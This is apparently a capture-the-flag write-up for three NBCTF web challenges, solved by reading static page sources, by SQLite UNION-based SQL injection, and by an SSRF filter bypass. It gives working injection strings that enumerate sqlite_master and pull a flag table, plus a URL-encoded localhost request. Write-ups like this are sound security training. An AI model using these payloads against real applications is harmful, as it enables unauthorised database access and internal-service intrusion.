search

Web Challenges

hashtag
Inspector Gadget

hashtag
Description

While snooping around this website, inspector gadet lost parts of his flag. Can you help him find it?

inspector-gadget.chal.nbctf.comarrow-up-right

Author: Goodbye

hashtag
Solution

Given website is statically serving html files, different pages can be found from source:

<script>
    function openotherpage() { window.location.href = "Page1.html"; }
    function opengadgetarms() { window.location.href = "gadgetarms.html"; }
    function opengadgetcoat() { window.location.href = "gadgetcoat.html"; }
    function opengadgethat() { window.location.href = "gadgethat.html"; }
    function opengadgetskates() { window.location.href = "gadgetskates.html" }
    function opengadgetcopter() { window.location.href = "gadgetcopter.html" }
    function opengadgetmangifyingglass() { window.location.href="gadgetmag.html" }
    function opengadgetphone() { window.location.href="gadgetphone.html" }
    function getflag() { window.location.href="supersecrettopsecret.txt" }
</script>

Visit all urls with not so perfect script and grep:

chevron-rightCurl Grep Flag.shhashtag

  • <title>Flag Part 1/4:nbctf{G00d_</title> (gadgetmag.html)

  • Flag Part 2/4: J06_ (supersecrettopsecret.txt)

  • <img src="Krooter Gadget.jpg" alt="Flag Part 3/4: D3tect1v3_"> (index.html)

All that's missing is part 4. Lets check robots.txtarrow-up-right:

  • part 4/4 G4dg3t352} (mysecretfiles.html)

circle-check

Flag: nbctf{G00d_J06_D3tect1v3_G4dg3t352}

hashtag
walter's crystal shop

hashtag
Description

My buddy Walter is selling some crystals, check out his shop!

walters-crystal-shop.chal.nbctf.comarrow-up-right walters_crystal_shop.ziparrow-up-right

Author: kroot

hashtag
Solution

Challenge seems to be SQLi, trying the basic payload we get confirmation:

walters-crystal-shop-1

Identify columns length: Citrine' UNION SELECT 1,2,3 -- (Already known, but double check). We see new column with our values.

PayloadsAllTheThings - SQLite3arrow-up-right

Enumerate tables: Citrine' UNION SELECT 1,2,group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' -- Tables: crystals,flag

Enumerate flag table fields: Citrine' UNION SELECT 1,2,sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='flag' -- Fields: CREATE TABLE flag (flag TEXT)

Get the flag: Citrine' UNION SELECT 1,2,flag from flag --

circle-check

Flag: nbctf{h0p3fuLLy_7h3_D3A_d035n7_kn0w_ab0ut_th3_0th3r_cRyst4l5}

hashtag
secret tunnel

hashtag
Description

Can you find the flag on the other end of my secret tunnel?

secret-tunnel.chal.nbctf.comarrow-up-right secret_tunnel.ziparrow-up-right

Author: kroot

hashtag
Solution

Main website: This magical tunnel allows you to see the first 20 characters of any website! Can you pass through this tunnel and find the flag?

URL: https://google.comarrow-up-right Response: <!doctype html><html itemscope="

In the given source we see 2 apps being ran:

Flag app is running locally and is not accessible, if we want the flag we must make a get request to localhost:1337/flag.

Filters:

  • We cant type 127 for 127.0.0.1, but we can just use localhost.

  • . Prevents IPv4 address.

  • x No idea.

  • flag We cant have word flag in the url, but we can URLEncode the word and send it that way.

Final URL: http://localhost:1337/%66%6c%61%67

circle-check

Flag: nbctf{s3cr3t_7uNN3lllllllllll!}

PreviousNBCTFNextdo you hear that?

Last updated